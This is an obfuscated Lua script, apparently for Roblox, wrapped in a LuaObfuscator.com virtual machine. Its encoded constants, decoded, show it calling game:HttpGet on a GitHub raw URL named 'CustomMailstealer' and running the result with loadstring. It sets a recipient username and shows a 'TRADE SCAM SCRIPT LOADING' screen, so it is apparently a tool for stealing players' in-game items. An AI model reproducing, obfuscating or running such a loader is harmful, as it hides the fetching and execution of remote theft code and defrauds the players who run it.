--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v71=v2(v0(v30,16));if v19 then local v78=v5(v71,v19);v19=nil;return v78;else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (878 -(282 + 595)))) ;return v72-(v72%1) ;else local v73=931 -(857 + 74) ;local v74;while true do if (v73==0) then v74=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and 1) or ((1637 -(1523 + 114)) + 0) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -((984 -758) + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (119 -(32 + 85)) ;return (v37 * 256) + v36 ;end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(958 -(892 + (159 -94)))) then return (v42 * (40022563 -(17095841 + 6149506))) + (v41 * (121138 -55602)) + (v40 * ((1864 -1395) -213)) + v39 ;end if (v38==(350 -(87 + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v38=1;end end end local function v24()local v43=430 -((1957 -(1789 + 124)) + 386) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1487 -(998 + 488))) then v46=953 -((1568 -(745 + 21)) + 150) ;v47=(v20(v45,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -((3589 -2674) + 82)))) + v44 ;v43=(1 + 4) -3 ;end if (v43==(2 + 0)) then v48=v20(v45,27 -(5 + 1) ,31);v49=((v20(v45,116 -(29 + 55) )==(3 -2)) and  -(1188 -(1069 + 118))) or (2 -1) ;v43=(1061 -(87 + 968)) -3 ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=1 -0 ;end if (v43==(3 + 0)) then if (v48==(791 -(368 + 423))) then if (v47==0) then return v49 * (0 -0) ;else local v97=18 -(10 + 8) ;while true do if (v97==(0 -0)) then v48=1081 -((2806 -1786) + 60) ;v46=0 -0 ;break;end end end elseif (v48==(7874 -5827)) then return ((v47==(442 -(378 + 38 + 26))) and (v49 * ((3 -2)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1809 -786) ) * (v46 + (v47/((6 -(8 -4))^(490 -(145 + 293))))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1414 -(447 + 966)) );v18=v18 + v50 ;local v52={};for v69=702 -(376 + 325) , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==2) then v58=nil;v59=nil;v53=3;end if (v53~=4) then else while true do if (v54==0) then v55=0 + 0 ;v56=nil;v54=2 -1 ;end if ((604 -(268 + 335))==v54) then local v96=290 -(60 + 230) ;while true do if (v96==(572 -(426 + 146))) then v57=nil;v58=nil;v96=2 -1 ;end if (v96==(1203 -(373 + 829))) then v54=733 -(476 + 255) ;break;end end end if (v54==(1 + 2)) then v61=nil;while true do local v98=1456 -(282 + 1174) ;local v99;while true do if (v98~=(811 -(569 + 242))) then else v99=0;while true do if (v99==(1 -0)) then if (v55==1) then v60=v23();v61={};for v150=1,v60 do local v151=0;local v152;local v153;local v154;while true do if (v151~=(2 -1)) then else v154=nil;while true do if (v152~=0) then else local v165=0 + 0 ;while true do if (v165==(1024 -(706 + 318))) then v153=v21();v154=nil;v165=1252 -(721 + 530) ;end if ((1272 -(945 + 326))==v165) then v152=1 -0 ;break;end end end if ((2 -1)==v152) then if (v153==(1 + 0)) then v154=v21()~=(216 -(42 + 174)) ;elseif (v153==(702 -(271 + 429))) then v154=v24();elseif (v153~=3) then else v154=v25();end v61[v150]=v154;break;end end break;end if (v151~=(0 + 0)) then else v152=0 + 0 ;v153=nil;v151=1501 -(1408 + 92) ;end end end v59[1089 -(461 + 625) ]=v21();v55=1 + 1 ;end break;end if (v99~=0) then else local v104=1504 -(363 + 1141) ;while true do if (v104==(1581 -(1183 + 397))) then v99=1289 -(993 + 295) ;break;end if (v104==0) then if ((0 + 0)~=v55) then else local v157=1171 -(418 + 753) ;while true do if (v157==2) then v55=1 + 0 ;break;end if (0~=v157) then else local v164=0 + 0 ;while true do if (v164~=1) then else v157=1 + 0 ;break;end if (v164==(0 + 0)) then v56={};v57={};v164=1 + 0 ;end end end if (v157==1) then v58={};v59={v56,v57,nil,v58};v157=1771 -(1749 + 20) ;end end end if (v55==(1663 -(1477 + 184))) then local v158=0 + 0 ;while true do if (1==v158) then return v59;end if (v158==(1322 -(1249 + 73))) then for v167=1 + 0 ,v23() do local v168=0;local v169;local v170;local v171;local v172;while true do if ((0 + 0)==v168) then v169=0;v170=nil;v168=857 -(564 + 292) ;end if (v168~=(1146 -(466 + 679))) then else v171=nil;v172=nil;v168=4 -2 ;end if (v168==2) then while true do if ((2 -1)==v169) then v172=nil;while true do if ((1900 -(106 + 1794))==v170) then local v175=0 + 0 ;while true do if (v175==1) then v170=1 + 0 ;break;end if (v175==(0 -0)) then v171=476 -(41 + 435) ;v172=nil;v175=1002 -(938 + 63) ;end end end if (v170==(2 -1)) then while true do if (v171~=(114 -(4 + 110))) then else v172=v21();if (v20(v172,1,1 + 0 )~=0) then else local v176=0;local v177;local v178;local v179;local v180;local v181;while true do if ((1127 -(936 + 189))~=v176) then else v181=nil;while true do if (v177==1) then v180=nil;v181=nil;v177=2;end if (v177==(584 -(57 + 527))) then local v182=0 + 0 ;while true do if ((1428 -(41 + 1386))==v182) then v177=104 -(17 + 86) ;break;end if (v182==(1613 -(1565 + 48))) then v178=0 + 0 ;v179=nil;v182=1 -0 ;end end end if (v177==(5 -3)) then while true do if (v178~=(168 -(122 + 44))) then else local v183=0 -0 ;local v184;while true do if (v183~=0) then else v184=0 -0 ;while true do if (v184==(1 -0)) then v178=3;break;end if ((0 -0)==v184) then local v192=1875 -(157 + 1718) ;while true do if (v192~=(0 + 0)) then else if (v20(v180,3 -2 ,1 + 0 )==(1 + 0)) then v181[3 -1 ]=v61[v181[67 -(30 + 35) ]];end if (v20(v180,2 + 0 ,1259 -(1043 + 214) )==(1 -0)) then v181[11 -8 ]=v61[v181[2 + 1 ]];end v192=1213 -(323 + 889) ;end if ((2 -1)~=v192) then else v184=1228 -(322 + 905) ;break;end end end end break;end end end if (v178==(614 -(602 + 9))) then if (v20(v180,1192 -(449 + 740) ,3)==(2 -1)) then v181[876 -(826 + 46) ]=v61[v181[584 -(361 + 219) ]];end v56[v167]=v181;break;end if (v178~=(948 -(245 + 702))) then else local v186=0;while true do if ((3 -2)==v186) then v178=322 -(53 + 267) ;break;end if (v186~=(0 + 0)) then else local v191=1898 -(260 + 1638) ;while true do if ((414 -(15 + 398))~=v191) then else v186=1;break;end if (v191==(982 -(18 + 964))) then v181={v22(),v22(),nil,nil};if (v179==(0 -0)) then local v194=0;while true do if (v194==(0 -0)) then v181[3]=v22();v181[4]=v22();break;end end elseif (v179==(1 + 0)) then v181[3]=v23();elseif (v179==(3 -1)) then v181[2 + 1 ]=v23() -((852 -(20 + 830))^(38 -22)) ;elseif (v179~=(1 + 2)) then else local v203=0 + 0 ;local v204;local v205;local v206;while true do if (v203==0) then v204=214 -(22 + 192) ;v205=nil;v203=127 -(116 + 10) ;end if (1==v203) then v206=nil;while true do if ((683 -(483 + 200))==v204) then v205=0 + 0 ;v206=nil;v204=1464 -(1404 + 59) ;end if (v204==(2 -1)) then while true do if (v205~=(738 -(542 + 196))) then else v206=0 -0 ;while true do if (v206==(562 -(334 + 228))) then v181[1 + 2 ]=v23() -((2 + 0)^16) ;v181[2 + 2 ]=v22();break;end end break;end end break;end end break;end end end v191=1 + 0 ;end end end end end if (v178==(0 -0)) then local v187=0 -0 ;local v188;while true do if (v187==(1551 -(1126 + 425))) then v188=405 -(118 + 287) ;while true do if (v188~=(0 -0)) then else local v193=0 -0 ;while true do if ((0 + 0)~=v193) then else v179=v20(v172,7 -5 ,8 -5 );v180=v20(v172,1125 -(118 + 1003) ,17 -11 );v193=1 + 0 ;end if (v193==(378 -(142 + 235))) then v188=1 + 0 ;break;end end end if (v188~=1) then else v178=4 -3 ;break;end end break;end end end end break;end end break;end if ((1 + 0)==v176) then v179=nil;v180=nil;v176=979 -(553 + 424) ;end if (v176~=(0 -0)) then else v177=765 -(574 + 191) ;v178=nil;v176=1 + 0 ;end end end break;end end break;end end break;end if (v169~=0) then else v170=0 + 0 ;v171=nil;v169=1;end end break;end end end for v173=1 + 0 ,v23() do v57[v173-(1 + 0) ]=v28();end v158=1 + 0 ;end end end v104=850 -(254 + 595) ;end end end end break;end end end break;end if ((128 -(55 + 71))~=v54) then else v59=nil;v60=nil;v54=2 + 1 ;end end break;end if ((0 -0)==v53) then v54=0 -0 ;v55=nil;v53=2 -1 ;end if (v53==(1 + 2)) then v60=nil;v61=nil;v53=19 -15 ;end if ((1 + 0)==v53) then v56=nil;v57=nil;v53=755 -(239 + 514) ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=9) then if (v92<=4) then if (v92<=1) then if (v92==0) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]]=v91[3];end elseif (v92<=2) then v89[v91[2]]();elseif (v92>3) then v83=v91[3];else local v132=v91[2];v89[v132]=v89[v132](v13(v89,v132 + 1 ,v84));end elseif (v92<=6) then if (v92==5) then local v107=v91[2];local v108,v109=v82(v89[v107](v13(v89,v107 + 1 ,v91[3])));v84=(v109 + v107) -1 ;local v110=0;for v123=v107,v84 do v110=v110 + 1 ;v89[v123]=v108[v110];end else local v111=v91[2];local v112,v113=v82(v89[v111](v13(v89,v111 + 1 ,v91[3])));v84=(v113 + v111) -1 ;local v114=0;for v126=v111,v84 do v114=v114 + 1 ;v89[v126]=v112[v114];end end elseif (v92<=7) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v64;else v89[v91[2]]=v64[v91[3]];end elseif (v92>8) then v89[v91[2]]();else v64[v91[3]]=v89[v91[2]];end elseif (v92<=14) then if (v92<=11) then if (v92==10) then local v115=v91[2];local v116=v89[v91[3]];v89[v115 + 1 ]=v116;v89[v115]=v116[v91[4]];elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v64;else v89[v91[2]]=v64[v91[3]];end elseif (v92<=12) then local v120=0;local v121;while true do if (v120==0) then v121=v91[2];v89[v121]=v89[v121](v13(v89,v121 + 1 ,v84));break;end end elseif (v92>13) then v64[v91[3]]=v89[v91[2]];else v89[v91[2]]=v91[3];end elseif (v92<=16) then if (v92==15) then v83=v91[3];else do return;end end elseif (v92<=17) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92>18) then local v147=0;local v148;local v149;while true do if (v147==0) then v148=v91[2];v149=v89[v91[3]];v147=1;end if (v147==1) then v89[v148 + 1 ]=v149;v89[v148]=v149[v91[4]];break;end end else do return;end end v83=v83 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503053O00536E697064030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030C3O0069616D7265646B65796D6F6E030F3O00475F4C6F6164696E675363722O656E03193O005452414445205343414D20534352495054204C4F4144494E4700163O00120D3O00013O00264O000D00010002002O043O000D000100120D000100043O001208000100033O00120B000100053O00120B000200063O00201300020002000700120D000400084O0006000200044O000C00013O00022O0002000100010001002O043O0015000100264O000100010001002O043O0001000100120D0001000A3O001208000100093O00120D0001000C3O0012080001000B3O00120D3O00023O002O043O000100012O00123O00017O00",v9(),...);
